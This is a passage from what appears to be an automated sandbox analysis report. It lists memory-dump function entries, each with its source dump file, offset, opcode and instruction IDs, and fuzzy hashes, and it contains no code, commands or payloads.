                                        • Instruction Fuzzy Hash: C7B11270E056198BCB45CFE9C9809DEFBF6AF89314F24C52AC409EB259D7349982CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c83f1f791cab4e9ed77b081f20e270d06facd083fe608b0a83e869c5fc25259e
                                        • Instruction ID: 142e4aa2c4e9e4c0d6ce7e29ce32a9fe324396c40771568411f96a77ce8cc19a
                                        • Opcode Fuzzy Hash: c83f1f791cab4e9ed77b081f20e270d06facd083fe608b0a83e869c5fc25259e
                                        • Instruction Fuzzy Hash: 1DA16B70E141598BCB14CFA9D5809AEFBF6FF89304F24C16AD808A731AD7359A41CF61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a217f02242f3ee11c4ca6ee3df8dec6e2fd6236000c3dc56b1d6559c8c884303
                                        • Instruction ID: 88766b644451e12199279a83af392f8c04ba4185393f3cd22af4721a4db02272
                                        • Opcode Fuzzy Hash: a217f02242f3ee11c4ca6ee3df8dec6e2fd6236000c3dc56b1d6559c8c884303
                                        • Instruction Fuzzy Hash: 1B917B70E142598FCB14CFA9D5809AEFBF6BF89300F24C1AAD804A731AD7359A41CF61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 81bf723e8573719e976cb812dce7815ba56f064c8c3e9cf2f834ccb9749406be
                                        • Instruction ID: 02c9807ed27155daa45249b68e3fec24a99133940a566feb8dfcf63384a2bf2d
                                        • Opcode Fuzzy Hash: 81bf723e8573719e976cb812dce7815ba56f064c8c3e9cf2f834ccb9749406be
                                        • Instruction Fuzzy Hash: EB612B74E052098FDB05CFA9C481AEEFBB6EF89311F14C42AD415E7258D7349A45CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5bb09c03b62b67a67e72f6e9dba9cac0a9d45227b94a617473afce447d234623
                                        • Instruction ID: b04120f0d47ddd800133a15289696d121da6228a57cff96312727ec3af5a8ca3
                                        • Opcode Fuzzy Hash: 5bb09c03b62b67a67e72f6e9dba9cac0a9d45227b94a617473afce447d234623
                                        • Instruction Fuzzy Hash: D471E574E15609DFCF04CFA9C9846DEFBF6BF88310F24942AD406BB228D33499418B65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8eaa7f9a330ca23865d029689bc716c9a94101c767b3bff189a030ca028a1a8b
                                        • Instruction ID: cf6e1f08296ed2a98994c96a771a162903d0fc141322a4d63155772891a43688
                                        • Opcode Fuzzy Hash: 8eaa7f9a330ca23865d029689bc716c9a94101c767b3bff189a030ca028a1a8b
                                        • Instruction Fuzzy Hash: 31610674E15209DFCF04CFA9C9856DEFBF6BF88310F24946AD406BB268D33499428B65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31627cefd42e721f30396ad0a3c530c3db3b263bbdc3969d5383b53ad62dd9c1
                                        • Instruction ID: fb1ef3094bd5c1556627430684cc304418c8b1b3151c02c503c1ef1420cb626e
                                        • Opcode Fuzzy Hash: 31627cefd42e721f30396ad0a3c530c3db3b263bbdc3969d5383b53ad62dd9c1
                                        • Instruction Fuzzy Hash: EE71F2B4E15209CFCB05CF99C5808AEFBB2FF48350F24961AD515A7358D734A982CF95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a8e1ad4f0a3ad5d95c893be68e461e1429ab0cfbb8c639fa99361ed83456e2d3
                                        • Instruction ID: c1acd50e1d9e8cb26ec13716d72b57da926b48109ae9f86e9a03110bb61bc7d7
                                        • Opcode Fuzzy Hash: a8e1ad4f0a3ad5d95c893be68e461e1429ab0cfbb8c639fa99361ed83456e2d3
                                        • Instruction Fuzzy Hash: 8E611470E0520A8FCB05CFA9C4808AEFBF2BF49310F28D65AD415A7359C734A982CF95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad1c81267167578fb9c2c37870d14778721ebfc3fcf4d45b5cf91804f5f6d526
                                        • Instruction ID: 623510f512c56dee7ffdf86abf08a3f4e4dd23250e5bae3c6421b896310a6ec5
                                        • Opcode Fuzzy Hash: ad1c81267167578fb9c2c37870d14778721ebfc3fcf4d45b5cf91804f5f6d526
                                        • Instruction Fuzzy Hash: E0412970E0560A9FCF04CFAAC4816AEFBF6BF88340F24C56AC515AB258D3349642CF95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4454faaf32c75111beaaf00425f8a790820725df02485b6ffcca51781dd6e37d
                                        • Instruction ID: b2d86c3345c3d63304767307f08b7e1b6956eea36cd5b99877b06e5a95502489
                                        • Opcode Fuzzy Hash: 4454faaf32c75111beaaf00425f8a790820725df02485b6ffcca51781dd6e37d
                                        • Instruction Fuzzy Hash: 2841F870E0560ADBCB04CFAAC5816AEFBF6BF89340F24D56AC515AB218D3359642CF94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 02d281054f519c56424b64cd014ad872499183c5bbca16261ff77336c02f1f69
                                        • Instruction ID: 8ef477b4752742c983150389931d81166c12cc59c5e6665d808187ea98999ebc
                                        • Opcode Fuzzy Hash: 02d281054f519c56424b64cd014ad872499183c5bbca16261ff77336c02f1f69
                                        • Instruction Fuzzy Hash: 99316970E156188BDB19CFAAD981BAEFBB7AF89300F14C46AD508B7258DB341A418F11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 083288a94b4fd654a2dce545bd0b41abfb67e8a5272cdfe116f57b04b24e8091
                                        • Instruction ID: 58b61e87b59f3fa359ba201723e07513e81df0f043e22d2ebe4c0313c955fa8f
                                        • Opcode Fuzzy Hash: 083288a94b4fd654a2dce545bd0b41abfb67e8a5272cdfe116f57b04b24e8091
                                        • Instruction Fuzzy Hash: 6121AD71E156488FDB09CFAAD8506EEBBF3EFC9300F14C0ABC448AB265D73409028B51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: deb593acba0a09a45f24a555fe85418df8abec2c2aa9db7fda021d23fced40f2
                                        • Instruction ID: cf48d9ce2b39a8a566afd9a3bbb7d903da22ecd0c42b91258f0b216810e11045
                                        • Opcode Fuzzy Hash: deb593acba0a09a45f24a555fe85418df8abec2c2aa9db7fda021d23fced40f2
                                        • Instruction Fuzzy Hash: A911F8B1E216199BDB48CFABD9406AEFAF7BBC9300F14D03AD408A7354DB305A418F95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339443283.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: LEj$LEj$LEj$LEj$LEj$LEj$LEj
                                        • API String ID: 0-1017780506
                                        • Opcode ID: 7b41ca2ed9a45b6636e8d4aba7724681073e0e15c3cc2f592dbb33aa24acdcce
                                        • Instruction ID: 8a84f7755535fd77e9920b504b2547ea088c066591a472bdfb8e71d5f9cb9b54
                                        • Opcode Fuzzy Hash: 7b41ca2ed9a45b6636e8d4aba7724681073e0e15c3cc2f592dbb33aa24acdcce
                                        • Instruction Fuzzy Hash: 67D14630601A01CFD764AB71EC0DB6D7BB2AF94306F15982AE51A8B6B1DF748C89DB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8ace01c6a9878378233693a8bafc6784611b6e89eda85ec411e21cb3871c3b4e
                                        • Instruction ID: 3a6dcc93fd22eb96ae59ac8b78896c9b706e5dbffe12136b0261239e61ec1799
                                        • Opcode Fuzzy Hash: 8ace01c6a9878378233693a8bafc6784611b6e89eda85ec411e21cb3871c3b4e
                                        • Instruction Fuzzy Hash: 2822A130B402148FEB15EBB4C8587AEB6F7AFC8304F14846AE42ADB396DF749C459B51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f5fb72491b853359b5fc0e1c06b00917ffc885b12bcbde12f846f1d2a5453bf8
                                        • Instruction ID: daeba917f041a681ad5359409b0b0d5ac70114aa9617c6a823f410857f4b4117
                                        • Opcode Fuzzy Hash: f5fb72491b853359b5fc0e1c06b00917ffc885b12bcbde12f846f1d2a5453bf8
                                        • Instruction Fuzzy Hash: AB129370B402148FDB65EBB4C8587AEB7E7AFC8304F148429E42ADB391DF749C459B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4a82c9c0c2173c69380212bb5d76186a79a0a6196e310366abfb863c0ccbcfc8
                                        • Instruction ID: 79f854c9b9c1f069a3ff8d3633b896ec801d94d54fbc839e67c1ca4a0b21b72e
                                        • Opcode Fuzzy Hash: 4a82c9c0c2173c69380212bb5d76186a79a0a6196e310366abfb863c0ccbcfc8
                                        • Instruction Fuzzy Hash: 9F12C430B402148FEB55EBB5C8587AEB6EBAFC8304F14842DD42ADB391DF749C598B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 432951c8eeb8debc949f095246176a38a1b5b7941efd2bcc8f54f6a20432e04b
                                        • Instruction ID: a21bfb10c74096d6056307cd33cf6bebd69ef7a383ba99bf3c84a3f00aff09cc
                                        • Opcode Fuzzy Hash: 432951c8eeb8debc949f095246176a38a1b5b7941efd2bcc8f54f6a20432e04b
                                        • Instruction Fuzzy Hash: 53128170B402188FEB15EBB4C8587AEB7EAAFC9304F14842DD42AEB391DF749C459B51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f000e3279b985f58b970fd9f242bdd6e4e6e674f4ff90b0b38107bb4789be90e
                                        • Instruction ID: 6d7df32e762ba0d4e72ea1bf3563f58d765a37e9b3953e98530135f29f39bc14
                                        • Opcode Fuzzy Hash: f000e3279b985f58b970fd9f242bdd6e4e6e674f4ff90b0b38107bb4789be90e
                                        • Instruction Fuzzy Hash: 7112B330B412148FDB15EBB4C8587AEB6EBAFC8304F14842DE42AEB395DF749C459B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 377f274fc5234ba1bb255cbffcf5cda323a0a6084278efaef1fd252008f773d3
                                        • Instruction ID: 6865944ce8b91a9205070579214950c7058d8953690a96509552c08432e7214a
                                        • Opcode Fuzzy Hash: 377f274fc5234ba1bb255cbffcf5cda323a0a6084278efaef1fd252008f773d3
                                        • Instruction Fuzzy Hash: EC129370B402188FEB15EBB5C8587AEB6EBAFC8304F14842DD42AEB391DF749C459B51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9883e5acac5f182d8460ef3f80300048c5a515e8d68197d75a886a1f8d092209
                                        • Instruction ID: 2cc5a623f42d60f74eb14c2851f3a7ee7d3a4980bdd7766001c806a47ea3727f
                                        • Opcode Fuzzy Hash: 9883e5acac5f182d8460ef3f80300048c5a515e8d68197d75a886a1f8d092209
                                        • Instruction Fuzzy Hash: 6912D130B412149FEB15EBB8C8587AEB7EAAFC8304F14842DD42AEB381DF749D458B51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 900dfd2b0dce180399e5c9ff91bf51b35b8f379ef073fd8a4653c71367c4ca0c
                                        • Instruction ID: 88f8276cffab5d552a0e5e4eb29d59575b6c5cc3f926c064961ae302c216577c
                                        • Opcode Fuzzy Hash: 900dfd2b0dce180399e5c9ff91bf51b35b8f379ef073fd8a4653c71367c4ca0c
                                        • Instruction Fuzzy Hash: E5E1C234B412048FE715EBB4C8187AEB7EAAFD9304F14842ED42ADB395DF789C4A8751
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9bcc2ec76568508c786708d8a06cf4a7029b5190523a791eced6860961cb32d4
                                        • Instruction ID: 3d2e64eb65235f35a8a57ca123b5aabb41d2c021f9c7ae4c0b789181afda4b09
                                        • Opcode Fuzzy Hash: 9bcc2ec76568508c786708d8a06cf4a7029b5190523a791eced6860961cb32d4
                                        • Instruction Fuzzy Hash: 13E1D530B412048FE755EBB4C8187AEB7EBAFC4304F14842AE41ADB391DF749C498791
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4ba2b43668e4d0d1f66f90beaf7f328cca925e5da565f8f48106c03ba6f04422
                                        • Instruction ID: 9a6a6fd87d284d4a4b8ee4bb19e1d75bad63bd7e05e79d869581e3140183b8f3
                                        • Opcode Fuzzy Hash: 4ba2b43668e4d0d1f66f90beaf7f328cca925e5da565f8f48106c03ba6f04422
                                        • Instruction Fuzzy Hash: 7BE1B330B412148FE715EBB4C8187AEB7EB9FC4304F14842AE41ADB395DF789C469791
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb806a3db729f3df876d03731027ac1d26ab5db68057743adadd04386bb03659
                                        • Instruction ID: e0715dc81e8cb5ec6f65569c47ade40ea9d0391971502318b701f588108d3ef8
                                        • Opcode Fuzzy Hash: eb806a3db729f3df876d03731027ac1d26ab5db68057743adadd04386bb03659
                                        • Instruction Fuzzy Hash: 81E1D434B412144FE715EBB4C8187AEB6EBAFC5304F14842AE41ADB392DF789C4A8751
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 27767d92d5218d4740635bd73043ba04c30b5c475a6dc5820d29dd7db3436231
                                        • Instruction ID: 599d83c68491c6c30cdfac1f3c4c9aa1bd041408117a3de3bb295cfc6bfab147
                                        • Opcode Fuzzy Hash: 27767d92d5218d4740635bd73043ba04c30b5c475a6dc5820d29dd7db3436231
                                        • Instruction Fuzzy Hash: 04D1E430B412049FE715EBB8C8187AEB7EBAFC8704F148429D42ADB391DF759D498751
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8125676313e64936abd6caed66ecfc994ac9ad1f748d26040a4cf55a3b769723
                                        • Instruction ID: df6dee4fc78007d89b779612978ac6896e4a447af4ff3d512fb7139b5b8618ea
                                        • Opcode Fuzzy Hash: 8125676313e64936abd6caed66ecfc994ac9ad1f748d26040a4cf55a3b769723
                                        • Instruction Fuzzy Hash: 5ED1A130B412148FE719EBB4C8187AEB6EBAFC8304F148429E42ADB396DF749C469751
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • KiUserExceptionDispatcher.NTDLL(000000FF), ref: 003803E4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339511055.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false
                                        Similarity
                                        • API ID: DispatcherExceptionUser
                                        • String ID:
                                        • API String ID: 6842923-0
                                        • Opcode ID: c83500c6beee2d12e76fa080246af2010ad06c5638dd01e8e03ef07a3c8881c6
                                        • Instruction ID: ba6724e8a8ce04a308b8cba05c9f7836969cb621e57351105ee3813efc168288
                                        • Opcode Fuzzy Hash: c83500c6beee2d12e76fa080246af2010ad06c5638dd01e8e03ef07a3c8881c6
                                        • Instruction Fuzzy Hash: 5151AD70E003089FDB19DFB4D8846DDBBF2AF84318F2585A9E410AB391DB749C89CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • KiUserExceptionDispatcher.NTDLL ref: 001E55BA
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339443283.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                        Similarity
                                        • API ID: DispatcherExceptionUser
                                        • String ID:
                                        • API String ID: 6842923-0
                                        • Opcode ID: 5603cbba38c429989f83b18fb30ae2f843f20e07d1b0ece0bbffd68d473c5c20
                                        • Instruction ID: 9425a00598838cc0b5db474ebd6bde63a605ea34ac880e73b42e84e7afd7d6b4
                                        • Opcode Fuzzy Hash: 5603cbba38c429989f83b18fb30ae2f843f20e07d1b0ece0bbffd68d473c5c20
                                        • Instruction Fuzzy Hash: D131EB341635009BCBA07B74FE0DA5C3B65FFA0216F64A927E616814B1DF30888AEF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • KiUserExceptionDispatcher.NTDLL ref: 001E55BA
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339443283.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                        Similarity
                                        • API ID: DispatcherExceptionUser
                                        • String ID:
                                        • API String ID: 6842923-0
                                        • Opcode ID: ae762ec08166728e01e201033103c6b2ac2d727ce0ee9bcf53bbe4c35a935c33
                                        • Instruction ID: 452aa1ce76fc990d2d23d1d976bff4c40d03330f3edfe49c94b7b80c1bd39081
                                        • Opcode Fuzzy Hash: ae762ec08166728e01e201033103c6b2ac2d727ce0ee9bcf53bbe4c35a935c33
                                        • Instruction Fuzzy Hash: 1B31D934163500DBCBA06B74FE0EA5D3B65FF60216F64A927E606C14B1DB30888AEF25
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e3a4afc7ed185832377d2eace196e447ba3fb6eac8ec397cd73a82c194d6b8c
                                        • Instruction ID: 07b2803e5706e424a0e01afa939bb28e5c839c8b1f76817f36af7ebc5c48ea57
                                        • Opcode Fuzzy Hash: 0e3a4afc7ed185832377d2eace196e447ba3fb6eac8ec397cd73a82c194d6b8c
                                        • Instruction Fuzzy Hash: DD9166B4B442408FD710EB78D818B6D7BE1AF85708F1584AAE54ACB3A2DB38DD06CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2dc92f470a92746ca9e04911006ef33fb2138dac2579d29d80d54e0cd2d2c7bd
                                        • Instruction ID: ea1317a6a0a423340a6166e00b1d57cb429942ec2f597f1f4b6a4cc38902f31d
                                        • Opcode Fuzzy Hash: 2dc92f470a92746ca9e04911006ef33fb2138dac2579d29d80d54e0cd2d2c7bd
                                        • Instruction Fuzzy Hash: 9641E430E442558FDB14EBB8D8087ADBBF6AF84304F15846AD406EB791DBB8DC85CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 440b6f024d23dfa8b308f0e2a88806d210b04fdc6d67e04d972cd0a956df9a5f
                                        • Instruction ID: 81eb602eceff62acfb95224eeada8458b7f9bdfb5303771d9b30547a736c2b46
                                        • Opcode Fuzzy Hash: 440b6f024d23dfa8b308f0e2a88806d210b04fdc6d67e04d972cd0a956df9a5f
                                        • Instruction Fuzzy Hash: 7E41D674A44644DFDB15EBB8C8187ADBBF2AF84304F15806AC406DB391DB789C89CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6b7dc52bfc20648f5652fd39af5603602b531d6107c55bde5e4887a411ff8dfa
                                        • Instruction ID: e39400339720d3cc438677de2992a647df1a339f0536a14b3e061a30e841be4a
                                        • Opcode Fuzzy Hash: 6b7dc52bfc20648f5652fd39af5603602b531d6107c55bde5e4887a411ff8dfa
                                        • Instruction Fuzzy Hash: 7C41D874A446488FDB14EFB8C8187AD7BF2AF84304F15856AD006DB296DB788C85CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 90c82e8a5ef713d0f27a1272150d1e1390f480685b3c629b61fffda87fddc47d
                                        • Instruction ID: 1e0ff447f88e084cefdd7d02f6b4c7809242ea7796b4c69776f3b912a793e4fc
                                        • Opcode Fuzzy Hash: 90c82e8a5ef713d0f27a1272150d1e1390f480685b3c629b61fffda87fddc47d
                                        • Instruction Fuzzy Hash: EB410A74E446448FDB15EBB4C418BADBBF2AF85304F15846AC006DB792DBB8CC4ACB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb04d2eaec59fcb08c684af19335280b15982dae016b53acb708323016d82c9d
                                        • Instruction ID: 9f449bc227a24341db78a7d12ee881ab2ecf33a25e481bb60b60785f76b6fd46
                                        • Opcode Fuzzy Hash: eb04d2eaec59fcb08c684af19335280b15982dae016b53acb708323016d82c9d
                                        • Instruction Fuzzy Hash: BB41E874A442159FDB24EFB8C818BAD7BF1AF94304F15846AD006DB391DBB8DC45CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93956be340002ec1aa56b7a5428981d4eba3f4cfddb2026a6238bb1737648a14
                                        • Instruction ID: ed747509619a866302bdbbcf71270a010fe91361fba36f4754a2d23979b1490f
                                        • Opcode Fuzzy Hash: 93956be340002ec1aa56b7a5428981d4eba3f4cfddb2026a6238bb1737648a14
                                        • Instruction Fuzzy Hash: E441E670B442459FDB14EBB8C418BAD7BF2AF84305F16846AD106DB3A1DBB8DC85CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58b06ef5d2eabedee39d94c6d9968edf961ba5f81b2936d0e8c1be94b0f8a928
                                        • Instruction ID: 877bae27021e04746dc17771df27dd052c52893907c8e4b78357d49bc929cfb1
                                        • Opcode Fuzzy Hash: 58b06ef5d2eabedee39d94c6d9968edf961ba5f81b2936d0e8c1be94b0f8a928
                                        • Instruction Fuzzy Hash: 4541E270E442449FDB15EFB8C8187ADBBF1AF94304F15846AC406DB292DBB88C86CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8ca8f2606ad2b677e6c1d0379a2983a7da0810892d8233bd481cfb04bf0130c
                                        • Instruction ID: adb30a3bc556077d044cbe2e8189395789a2b6beef700b4c31ab53d614781761
                                        • Opcode Fuzzy Hash: b8ca8f2606ad2b677e6c1d0379a2983a7da0810892d8233bd481cfb04bf0130c
                                        • Instruction Fuzzy Hash: 5241E670A44655CFDB14EFB8C8187ADBBF2AF85308F15856AC006DB291DBB88C45CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e90c2d0442d71845bfa868d78037426afac0b69a51548bdc1867aa76591524c9
                                        • Instruction ID: c2f5576e06c491749f578e107389ac0c65c798c9b7bc3f85ead37483c3f1a14d
                                        • Opcode Fuzzy Hash: e90c2d0442d71845bfa868d78037426afac0b69a51548bdc1867aa76591524c9
                                        • Instruction Fuzzy Hash: D331F430B493544FEF01AB749C586AD3BB29F85310F05457AD506D72D2EF2CC949CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2339751005.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 812cb31c7b1593878fde18b519e9c1e05b112ea715e99bbe81f8b27c02977e16
                                        • Instruction ID: 717376f273d0c6ebd327e7aa586d2bf537336ffa7691be804a9240592b27ed35
